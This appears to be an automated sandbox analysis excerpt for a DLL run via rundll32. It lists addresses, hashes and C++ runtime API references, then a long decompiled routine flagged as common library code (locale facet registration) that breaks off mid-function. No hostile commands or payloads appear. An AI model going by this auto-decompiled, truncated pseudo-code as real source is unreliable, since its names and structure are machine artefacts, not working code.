0x6e20fa2d
0x6e20fa2f
0x6e20fa35
0x6e20fa3b
0x6e20fa43
0x6e20fa46
0x6e20fa83
0x6e20fa91
0x6e20fa96
0x6e20fa9e
0x6e20faa8
0x6e20faad
0x6e20fab8
0x6e20fabc
0x6e20fabf
0x6e20fac4
0x6e20facd
0x6e20facf
0x6e20fad1
0x6e20fb16
0x6e20fb19
0x6e20fb25
0x6e20fad3
0x6e20fad3
0x6e20fad5
0x6e20fadb
0x6e20fae1
0x6e20fae9
0x6e20faec
0x6e20fb29
0x6e20fb37
0x6e20fb3c
0x6e20fb44
0x6e20fb4e
0x6e20fb53
0x6e20fb5e
0x6e20fb62
0x6e20fb65
0x6e20fb6a
0x6e20fb73
0x6e20fb75
0x6e20fb77
0x6e20fbbc
0x6e20fbbf
0x6e20fbcb
0x6e20fb79
0x6e20fb79
0x6e20fb7b
0x6e20fb81
0x6e20fb87
0x6e20fb8f
0x6e20fb92
0x6e20fbcf
0x6e20fbdd
0x6e20fbe2
0x6e20fbea
0x6e20fbf4
0x6e20fbf9
0x6e20fc04
0x6e20fc08
0x6e20fc0b
0x6e20fc10
0x6e20fc19
0x6e20fc1b
0x6e20fc1d
0x6e20fc62
0x6e20fc65
0x6e20fc71
0x6e20fc1f
0x6e20fc1f
0x6e20fc21
0x6e20fc27
0x6e20fc2d
0x6e20fc35
0x6e20fc38
0x6e20fc75
0x6e20fc83
0x6e20fc88
0x6e20fc90
0x6e20fc9a
0x6e20fc9f
0x6e20fcaa
0x6e20fcae
0x6e20fcb1
0x6e20fcb6
0x6e20fcbf
0x6e20fcc1
0x6e20fcc3
0x6e20fd08
0x6e20fd0b
0x6e20fd17
0x6e20fcc5
0x6e20fcc5
0x6e20fcc7
0x6e20fccd
0x6e20fcd3
0x6e20fcdb
0x6e20fcde
0x6e20fd18
0x6e20fd1b
0x6e20fd29
0x6e20fd2e
0x6e20fd36
0x6e20fd3b
0x6e20fd3d
0x6e20fd43
0x6e20fd46
0x6e20fd4f
0x6e20fd4f
0x6e20fd4f
0x6e20fd53
0x6e20fd59
0x6e20fd5c
0x6e20fd68
0x6e20fce0
0x6e20fce0
0x6e20fce3
0x6e20fce7
0x6e20fceb
0x6e20fcf8
0x6e20fd00
0x6e20fd02
0x00000000
0x6e20fd02
0x6e20fcc9
0x6e20fcc9
0x00000000
0x6e20fcc9
0x6e20fcc7
0x6e20fc3a
0x6e20fc3a
0x6e20fc3d
0x6e20fc41
0x6e20fc45
0x6e20fc52
0x6e20fc5a
0x6e20fc5c
0x00000000
0x6e20fc5c
0x6e20fc23
0x6e20fc23
0x00000000
0x6e20fc23
0x6e20fc21
0x6e20fb94
0x6e20fb94
0x6e20fb97
0x6e20fb9b
0x6e20fb9f
0x6e20fbac
0x6e20fbb4
0x6e20fbb6
0x00000000
0x6e20fbb6
0x6e20fb7d
0x6e20fb7d
0x00000000
0x6e20fb7d
0x6e20fb7b
0x6e20faee
0x6e20faee
0x6e20faf1
0x6e20faf5
0x6e20faf9
0x6e20fb06
0x6e20fb0e
0x6e20fb10
0x00000000
0x6e20fb10
0x6e20fad7
0x6e20fad7
0x00000000
0x6e20fad7
0x6e20fad5
0x6e20fa48
0x6e20fa48
0x6e20fa4b
0x6e20fa4f
0x6e20fa53
0x6e20fa60
0x6e20fa68
0x6e20fa6a
0x00000000
0x6e20fa6a
0x6e20fa31
0x6e20fa31
0x00000000
0x6e20fa31
0x6e20fa2f
0x6e20f9a2
0x6e20f9a2
0x6e20f9a5
0x6e20f9a9
0x6e20f9ad
0x6e20f9ba
0x6e20f9c2
0x6e20f9c4
0x00000000
0x6e20f9c4
0x6e20f98b
0x6e20f98b
0x00000000
0x6e20f98b
0x6e20f989
0x6e20f8fc
0x6e20f8fc
0x6e20f8ff
0x6e20f903
0x6e20f907
0x6e20f914
0x6e20f91c
0x6e20f91e
0x00000000
0x6e20f91e
0x6e20f8e5
0x6e20f8e5
0x00000000
0x6e20f8e5
0x6e20f8e3
0x6e20f856
0x6e20f856
0x6e20f859
0x6e20f85d
0x6e20f861
0x6e20f86e
0x6e20f876
0x6e20f878
0x00000000
0x6e20f878
0x6e20f83f
0x6e20f83f
0x00000000
0x6e20f83f
0x6e20f83d
0x6e20f7b0
0x6e20f7b0
0x6e20f7b3
0x6e20f7b7
0x6e20f7bb
0x6e20f7c8
0x6e20f7d0
0x6e20f7d2
0x00000000
0x6e20f7d2
0x6e20f799
0x6e20f799
0x00000000
0x6e20f799
0x6e20f797
0x6e20f70a
0x6e20f70a
0x6e20f70d
0x6e20f711
0x6e20f715
0x6e20f722
0x6e20f72a
0x6e20f72c
0x00000000
0x6e20f72c
0x6e20f6f3
0x6e20f6f3
0x00000000
0x6e20f6f3
0x6e20f6f1
0x6e20f664
0x6e20f664
0x6e20f667
0x6e20f66b
0x6e20f66f
0x6e20f67c
0x6e20f684
0x6e20f686
0x00000000
0x6e20f686
0x6e20f64d
0x6e20f64d
0x00000000
0x6e20f64d
0x6e20f64b
0x6e20f5be
0x6e20f5be
0x6e20f5c1
0x6e20f5c5
0x6e20f5c9
0x6e20f5d6
0x6e20f5de
0x6e20f5e0
0x00000000
0x6e20f5e0
0x6e20f5a7
0x6e20f5a7
0x00000000
0x6e20f5a7
0x6e20f5a5
0x6e20f518
0x6e20f518
0x6e20f51b
0x6e20f51f
0x6e20f523
0x6e20f530
0x6e20f538
0x6e20f53a
0x00000000
0x6e20f53a
0x6e20f501
0x6e20f501
0x00000000
0x6e20f501
0x6e20f4ff

APIs

__EH_prolog3.LIBCMT ref: 6E20F4C8
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F4D2
int.LIBCPMT ref: 6E20F4E9

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20F523
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F543
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F561

Strings

tm,n, xrefs: 6E20F4DD

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: tm,n
API String ID: 651022567-372086613
Opcode ID: 1951ed48773d5ff228fac4f0635718d98ab2077ab9a3fa9f3a9494e45eddadb4
Instruction ID: 3d7b4184a9cf290e8d376da37961dc493cf19a053d9752398efd262e1cf1dcd8
Opcode Fuzzy Hash: 1951ed48773d5ff228fac4f0635718d98ab2077ab9a3fa9f3a9494e45eddadb4
Instruction Fuzzy Hash: 9411C67991091E9BCF01DBE4CC94AEEB77BBF44B18F240908E5106B2D0EFB4AA44C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F375, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E6E20F375(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t223;
				signed int _t224;
				void* _t236;
				void* _t249;
				void* _t262;
				void* _t275;
				void* _t288;
				void* _t301;
				void* _t314;
				void* _t327;
				void* _t340;
				void* _t353;
				void* _t366;
				void* _t379;
				void* _t392;
				void* _t405;
				signed int _t587;
				signed int _t636;
				signed int _t637;
				signed int _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t642;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				signed int _t646;
				signed int _t647;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				signed int _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				signed int _t663;
				signed int _t664;
				signed int _t665;
				signed int _t666;
				void* _t682;

				_t633 = __edx;
				_t482 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t682 - 0x14, 0);
				_t651 =  *0x6e2c6dbc; // 0x0
				 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
				 *(_t682 - 0x10) = _t651;
				_t223 = E6E1E161C(0x6e2c6d70);
				_t485 =  *((intOrPtr*)(_t682 + 8));
				_t224 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t223);
				_t635 = _t224;
				if(_t224 != 0) {
					L5:
					E6E2066BA(_t682 - 0x14);
					return E6E220075(_t635);
				} else {
					if(_t651 == 0) {
						_push( *((intOrPtr*)(_t682 + 8)));
						_push(_t682 - 0x10);
						__eflags = E6E210FEF(__ebx, _t485, __edx, _t635, _t651) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t682 - 0x20);
							E6E223D74(_t682 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t635, _t651, 0x14);
							E6E206653(_t682 - 0x14, 0);
							_t652 =  *0x6e2c6df0; // 0x0
							 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
							 *(_t682 - 0x10) = _t652;
							_t236 = E6E1E161C(0x6e2c6d9c);
							_t492 =  *((intOrPtr*)(_t682 + 8));
							_t636 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t236);
							__eflags = _t636;
							if(_t636 != 0) {
								L12:
								E6E2066BA(_t682 - 0x14);
								return E6E220075(_t636);
							} else {
								__eflags = _t652;
								if(_t652 == 0) {
									_push( *((intOrPtr*)(_t682 + 8)));
									_push(_t682 - 0x10);
									__eflags = E6E211057(_t482, _t492, __edx, _t636, _t652) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t682 - 0x20);
										E6E223D74(_t682 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t482, _t636, _t652, 0x14);
										E6E206653(_t682 - 0x14, 0);
										_t653 =  *0x6e2c6dc0; // 0x0
										 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
										 *(_t682 - 0x10) = _t653;
										_t249 = E6E1E161C(0x6e2c6d74);
										_t499 =  *((intOrPtr*)(_t682 + 8));
										_t637 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t249);
										__eflags = _t637;
										if(_t637 != 0) {
											L19:
											E6E2066BA(_t682 - 0x14);
											return E6E220075(_t637);
										} else {
											__eflags = _t653;
											if(_t653 == 0) {
												_push( *((intOrPtr*)(_t682 + 8)));
												_push(_t682 - 0x10);
												__eflags = E6E2110BF(_t482, _t499, __edx, _t637, _t653) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t682 - 0x20);
													E6E223D74(_t682 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t482, _t637, _t653, 0x14);
													E6E206653(_t682 - 0x14, 0);
													_t654 =  *0x6e2c6df8; // 0x0
													 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
													 *(_t682 - 0x10) = _t654;
													_t262 = E6E1E161C(0x6e2c6da4);
													_t506 =  *((intOrPtr*)(_t682 + 8));
													_t638 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t262);
													__eflags = _t638;
													if(_t638 != 0) {
														L26:
														E6E2066BA(_t682 - 0x14);
														return E6E220075(_t638);
													} else {
														__eflags = _t654;
														if(_t654 == 0) {
															_push( *((intOrPtr*)(_t682 + 8)));
															_push(_t682 - 0x10);
															__eflags = E6E211127(_t482, _t506, _t633, _t638, _t654) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t682 - 0x20);
																E6E223D74(_t682 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t482, _t638, _t654, 0x14);
																E6E206653(_t682 - 0x14, 0);
																_t655 =  *0x6e2c6df4; // 0x0
																 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																 *(_t682 - 0x10) = _t655;
																_t275 = E6E1E161C(0x6e2c6da0);
																_t513 =  *((intOrPtr*)(_t682 + 8));
																_t639 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t275);
																__eflags = _t639;
																if(_t639 != 0) {
																	L33:
																	E6E2066BA(_t682 - 0x14);
																	return E6E220075(_t639);
																} else {
																	__eflags = _t655;
																	if(_t655 == 0) {
																		_push( *((intOrPtr*)(_t682 + 8)));
																		_push(_t682 - 0x10);
																		__eflags = E6E2111AB(_t482, _t513, _t633, _t639, _t655) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t682 - 0x20);
																			E6E223D74(_t682 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t482, _t639, _t655, 0x14);
																			E6E206653(_t682 - 0x14, 0);
																			_t656 =  *0x6e2c6dc8; // 0x0
																			 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																			 *(_t682 - 0x10) = _t656;
																			_t288 = E6E1E161C(0x6e2c6d7c);
																			_t520 =  *((intOrPtr*)(_t682 + 8));
																			_t640 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t288);
																			__eflags = _t640;
																			if(_t640 != 0) {
																				L40:
																				E6E2066BA(_t682 - 0x14);
																				return E6E220075(_t640);
																			} else {
																				__eflags = _t656;
																				if(_t656 == 0) {
																					_push( *((intOrPtr*)(_t682 + 8)));
																					_push(_t682 - 0x10);
																					__eflags = E6E211230(_t482, _t520, _t633, _t640, _t656) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t682 - 0x20);
																						E6E223D74(_t682 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t482, _t640, _t656, 0x14);
																						E6E206653(_t682 - 0x14, 0);
																						_t657 =  *0x6e2c6dc4; // 0x0
																						 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																						 *(_t682 - 0x10) = _t657;
																						_t301 = E6E1E161C(0x6e2c6d78);
																						_t527 =  *((intOrPtr*)(_t682 + 8));
																						_t641 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t301);
																						__eflags = _t641;
																						if(_t641 != 0) {
																							L47:
																							E6E2066BA(_t682 - 0x14);
																							return E6E220075(_t641);
																						} else {
																							__eflags = _t657;
																							if(_t657 == 0) {
																								_push( *((intOrPtr*)(_t682 + 8)));
																								_push(_t682 - 0x10);
																								__eflags = E6E2112B4(_t482, _t527, _t633, _t641, _t657) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t682 - 0x20);
																									E6E223D74(_t682 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t482, _t641, _t657, 0x14);
																									E6E206653(_t682 - 0x14, 0);
																									_t658 =  *0x6e2c6dd8; // 0x0
																									 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																									 *(_t682 - 0x10) = _t658;
																									_t314 = E6E1E161C(0x6e2c6d84);
																									_t534 =  *((intOrPtr*)(_t682 + 8));
																									_t642 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t314);
																									__eflags = _t642;
																									if(_t642 != 0) {
																										L54:
																										E6E2066BA(_t682 - 0x14);
																										return E6E220075(_t642);
																									} else {
																										__eflags = _t658;
																										if(_t658 == 0) {
																											_push( *((intOrPtr*)(_t682 + 8)));
																											_push(_t682 - 0x10);
																											__eflags = E6E211339(_t482, _t534, _t633, _t642, _t658) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t682 - 0x20);
																												E6E223D74(_t682 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t482, _t642, _t658, 0x14);
																												E6E206653(_t682 - 0x14, 0);
																												_t659 =  *0x6e2c6db0; // 0x0
																												 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																												 *(_t682 - 0x10) = _t659;
																												_t327 = E6E1E161C(0x6e2c6d64);
																												_t541 =  *((intOrPtr*)(_t682 + 8));
																												_t643 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t327);
																												__eflags = _t643;
																												if(_t643 != 0) {
																													L61:
																													E6E2066BA(_t682 - 0x14);
																													return E6E220075(_t643);
																												} else {
																													__eflags = _t659;
																													if(_t659 == 0) {
																														_push( *((intOrPtr*)(_t682 + 8)));
																														_push(_t682 - 0x10);
																														__eflags = E6E2113A1(_t482, _t541, _t633, _t643, _t659) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t682 - 0x20);
																															E6E223D74(_t682 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t482, _t643, _t659, 0x14);
																															E6E206653(_t682 - 0x14, 0);
																															_t660 =  *0x6e2c6ddc; // 0x0
																															 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																															 *(_t682 - 0x10) = _t660;
																															_t340 = E6E1E161C(0x6e2c6d88);
																															_t548 =  *((intOrPtr*)(_t682 + 8));
																															_t644 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t340);
																															__eflags = _t644;
																															if(_t644 != 0) {
																																L68:
																																E6E2066BA(_t682 - 0x14);
																																return E6E220075(_t644);
																															} else {
																																__eflags = _t660;
																																if(_t660 == 0) {
																																	_push( *((intOrPtr*)(_t682 + 8)));
																																	_push(_t682 - 0x10);
																																	__eflags = E6E211409(_t482, _t548, _t633, _t644, _t660) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t682 - 0x20);
																																		E6E223D74(_t682 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t482, _t644, _t660, 0x14);
																																		E6E206653(_t682 - 0x14, 0);
																																		_t661 =  *0x6e2c6de0; // 0x0
																																		 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																		 *(_t682 - 0x10) = _t661;
																																		_t353 = E6E1E161C(0x6e2c6d8c);
																																		_t555 =  *((intOrPtr*)(_t682 + 8));
																																		_t645 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t353);
																																		__eflags = _t645;
																																		if(_t645 != 0) {
																																			L75:
																																			E6E2066BA(_t682 - 0x14);
																																			return E6E220075(_t645);
																																		} else {
																																			__eflags = _t661;
																																			if(_t661 == 0) {
																																				_push( *((intOrPtr*)(_t682 + 8)));
																																				_push(_t682 - 0x10);
																																				__eflags = E6E211471(_t482, _t555, _t633, _t645, _t661) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t682 - 0x20);
																																					E6E223D74(_t682 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t482, _t645, _t661, 0x14);
																																					E6E206653(_t682 - 0x14, 0);
																																					_t662 =  *0x6e2c6dfc; // 0x0
																																					 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																					 *(_t682 - 0x10) = _t662;
																																					_t366 = E6E1E161C(0x6e2c6da8);
																																					_t562 =  *((intOrPtr*)(_t682 + 8));
																																					_t646 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t366);
																																					__eflags = _t646;
																																					if(_t646 != 0) {
																																						L82:
																																						E6E2066BA(_t682 - 0x14);
																																						return E6E220075(_t646);
																																					} else {
																																						__eflags = _t662;
																																						if(_t662 == 0) {
																																							_push( *((intOrPtr*)(_t682 + 8)));
																																							_push(_t682 - 0x10);
																																							__eflags = E6E2114EC(_t482, _t562, _t633, _t646, _t662) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t682 - 0x20);
																																								E6E223D74(_t682 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t482, _t646, _t662, 0x14);
																																								E6E206653(_t682 - 0x14, 0);
																																								_t663 =  *0x6e2c6dcc; // 0x0
																																								 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																								 *(_t682 - 0x10) = _t663;
																																								_t379 = E6E1E161C(0x6e2c6d80);
																																								_t569 =  *((intOrPtr*)(_t682 + 8));
																																								_t647 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t379);
																																								__eflags = _t647;
																																								if(_t647 != 0) {
																																									L89:
																																									E6E2066BA(_t682 - 0x14);
																																									return E6E220075(_t647);
																																								} else {
																																									__eflags = _t663;
																																									if(_t663 == 0) {
																																										_push( *((intOrPtr*)(_t682 + 8)));
																																										_push(_t682 - 0x10);
																																										__eflags = E6E211558(_t482, _t569, _t633, _t647, _t663) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t682 - 0x20);
																																											E6E223D74(_t682 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t482, _t647, _t663, 0x14);
																																											E6E206653(_t682 - 0x14, 0);
																																											_t664 =  *0x6e2c6e00; // 0x0
																																											 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																											 *(_t682 - 0x10) = _t664;
																																											_t392 = E6E1E161C(0x6e2c6dac);
																																											_t576 =  *((intOrPtr*)(_t682 + 8));
																																											_t648 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t392);
																																											__eflags = _t648;
																																											if(_t648 != 0) {
																																												L96:
																																												E6E2066BA(_t682 - 0x14);
																																												return E6E220075(_t648);
																																											} else {
																																												__eflags = _t664;
																																												if(_t664 == 0) {
																																													_push( *((intOrPtr*)(_t682 + 8)));
																																													_push(_t682 - 0x10);
																																													__eflags = E6E2115C4(_t482, _t576, _t633, _t648, _t664) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t682 - 0x20);
																																														E6E223D74(_t682 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t482, _t648, _t664, 0x14);
																																														E6E206653(_t682 - 0x14, 0);
																																														_t665 =  *0x6e2c6dd0; // 0x0
																																														 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																														 *(_t682 - 0x10) = _t665;
																																														_t405 = E6E1E161C(0x6e2c6d60);
																																														_t583 =  *((intOrPtr*)(_t682 + 8));
																																														_t649 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t405);
																																														__eflags = _t649;
																																														if(_t649 != 0) {
																																															L103:
																																															E6E2066BA(_t682 - 0x14);
																																															return E6E220075(_t649);
																																														} else {
																																															__eflags = _t665;
																																															if(_t665 == 0) {
																																																_push( *((intOrPtr*)(_t682 + 8)));
																																																_push(_t682 - 0x10);
																																																__eflags = E6E21162A(_t482, _t583, _t633, _t649, _t665) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	_t587 = _t682 - 0x20;
																																																	E6E1E1438(_t587);
																																																	E6E223D74(_t682 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e26851f, _t482, _t649, _t665, 4);
																																																	_t666 = _t587;
																																																	 *(_t682 - 0x10) = _t666;
																																																	 *((intOrPtr*)(_t666 + 4)) =  *((intOrPtr*)(_t682 + 0xc));
																																																	_push( *((intOrPtr*)(_t682 + 0x14)));
																																																	_t217 = _t682 - 4;
																																																	 *_t217 =  *(_t682 - 4) & 0x00000000;
																																																	__eflags =  *_t217;
																																																	 *_t666 = 0x6e26c0c4;
																																																	 *((char*)(_t666 + 0x28)) =  *((intOrPtr*)(_t682 + 0x10));
																																																	E6E21542F(_t482, _t587, _t633, _t649, _t666,  *_t217);
																																																	return E6E220075(_t666,  *((intOrPtr*)(_t682 + 8)));
																																																} else {
																																																	_t649 =  *(_t682 - 0x10);
																																																	 *(_t682 - 0x10) = _t649;
																																																	 *(_t682 - 4) = 1;
																																																	E6E206FD3(__eflags, _t649);
																																																	 *0x6e26a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t649 + 4))))();
																																																	 *0x6e2c6dd0 = _t649;
																																																	goto L103;
																																																}
																																															} else {
																																																_t649 = _t665;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t648 =  *(_t682 - 0x10);
																																														 *(_t682 - 0x10) = _t648;
																																														 *(_t682 - 4) = 1;
																																														E6E206FD3(__eflags, _t648);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t648 + 4))))();
																																														 *0x6e2c6e00 = _t648;
																																														goto L96;
																																													}
																																												} else {
																																													_t648 = _t664;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t647 =  *(_t682 - 0x10);
																																											 *(_t682 - 0x10) = _t647;
																																											 *(_t682 - 4) = 1;
																																											E6E206FD3(__eflags, _t647);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t647 + 4))))();
																																											 *0x6e2c6dcc = _t647;
																																											goto L89;
																																										}
																																									} else {
																																										_t647 = _t663;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t646 =  *(_t682 - 0x10);
																																								 *(_t682 - 0x10) = _t646;
																																								 *(_t682 - 4) = 1;
																																								E6E206FD3(__eflags, _t646);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t646 + 4))))();
																																								 *0x6e2c6dfc = _t646;
																																								goto L82;
																																							}
																																						} else {
																																							_t646 = _t662;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t645 =  *(_t682 - 0x10);
																																					 *(_t682 - 0x10) = _t645;
																																					 *(_t682 - 4) = 1;
																																					E6E206FD3(__eflags, _t645);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t645 + 4))))();
																																					 *0x6e2c6de0 = _t645;
																																					goto L75;
																																				}
																																			} else {
																																				_t645 = _t661;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t644 =  *(_t682 - 0x10);
																																		 *(_t682 - 0x10) = _t644;
																																		 *(_t682 - 4) = 1;
																																		E6E206FD3(__eflags, _t644);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t644 + 4))))();
																																		 *0x6e2c6ddc = _t644;
																																		goto L68;
																																	}
																																} else {
																																	_t644 = _t660;
																																	goto L68;
																																}
																															}
																														} else {
																															_t643 =  *(_t682 - 0x10);
																															 *(_t682 - 0x10) = _t643;
																															 *(_t682 - 4) = 1;
																															E6E206FD3(__eflags, _t643);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t643 + 4))))();
																															 *0x6e2c6db0 = _t643;
																															goto L61;
																														}
																													} else {
																														_t643 = _t659;
																														goto L61;
																													}
																												}
																											} else {
																												_t642 =  *(_t682 - 0x10);
																												 *(_t682 - 0x10) = _t642;
																												 *(_t682 - 4) = 1;
																												E6E206FD3(__eflags, _t642);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t642 + 4))))();
																												 *0x6e2c6dd8 = _t642;
																												goto L54;
																											}
																										} else {
																											_t642 = _t658;
																											goto L54;
																										}
																									}
																								} else {
																									_t641 =  *(_t682 - 0x10);
																									 *(_t682 - 0x10) = _t641;
																									 *(_t682 - 4) = 1;
																									E6E206FD3(__eflags, _t641);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t641 + 4))))();
																									 *0x6e2c6dc4 = _t641;
																									goto L47;
																								}
																							} else {
																								_t641 = _t657;
																								goto L47;
																							}
																						}
																					} else {
																						_t640 =  *(_t682 - 0x10);
																						 *(_t682 - 0x10) = _t640;
																						 *(_t682 - 4) = 1;
																						E6E206FD3(__eflags, _t640);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t640 + 4))))();
																						 *0x6e2c6dc8 = _t640;
																						goto L40;
																					}
																				} else {
																					_t640 = _t656;
																					goto L40;
																				}
																			}
																		} else {
																			_t639 =  *(_t682 - 0x10);
																			 *(_t682 - 0x10) = _t639;
																			 *(_t682 - 4) = 1;
																			E6E206FD3(__eflags, _t639);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t639 + 4))))();
																			 *0x6e2c6df4 = _t639;
																			goto L33;
																		}
																	} else {
																		_t639 = _t655;
																		goto L33;
																	}
																}
															} else {
																_t638 =  *(_t682 - 0x10);
																 *(_t682 - 0x10) = _t638;
																 *(_t682 - 4) = 1;
																E6E206FD3(__eflags, _t638);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t638 + 4))))();
																 *0x6e2c6df8 = _t638;
																goto L26;
															}
														} else {
															_t638 = _t654;
															goto L26;
														}
													}
												} else {
													_t637 =  *(_t682 - 0x10);
													 *(_t682 - 0x10) = _t637;
													 *(_t682 - 4) = 1;
													E6E206FD3(__eflags, _t637);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t637 + 4))))();
													 *0x6e2c6dc0 = _t637;
													goto L19;
												}
											} else {
												_t637 = _t653;
												goto L19;
											}
										}
									} else {
										_t636 =  *(_t682 - 0x10);
										 *(_t682 - 0x10) = _t636;
										 *(_t682 - 4) = 1;
										E6E206FD3(__eflags, _t636);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t636 + 4))))();
										 *0x6e2c6df0 = _t636;
										goto L12;
									}
								} else {
									_t636 = _t652;
									goto L12;
								}
							}
						} else {
							_t635 =  *(_t682 - 0x10);
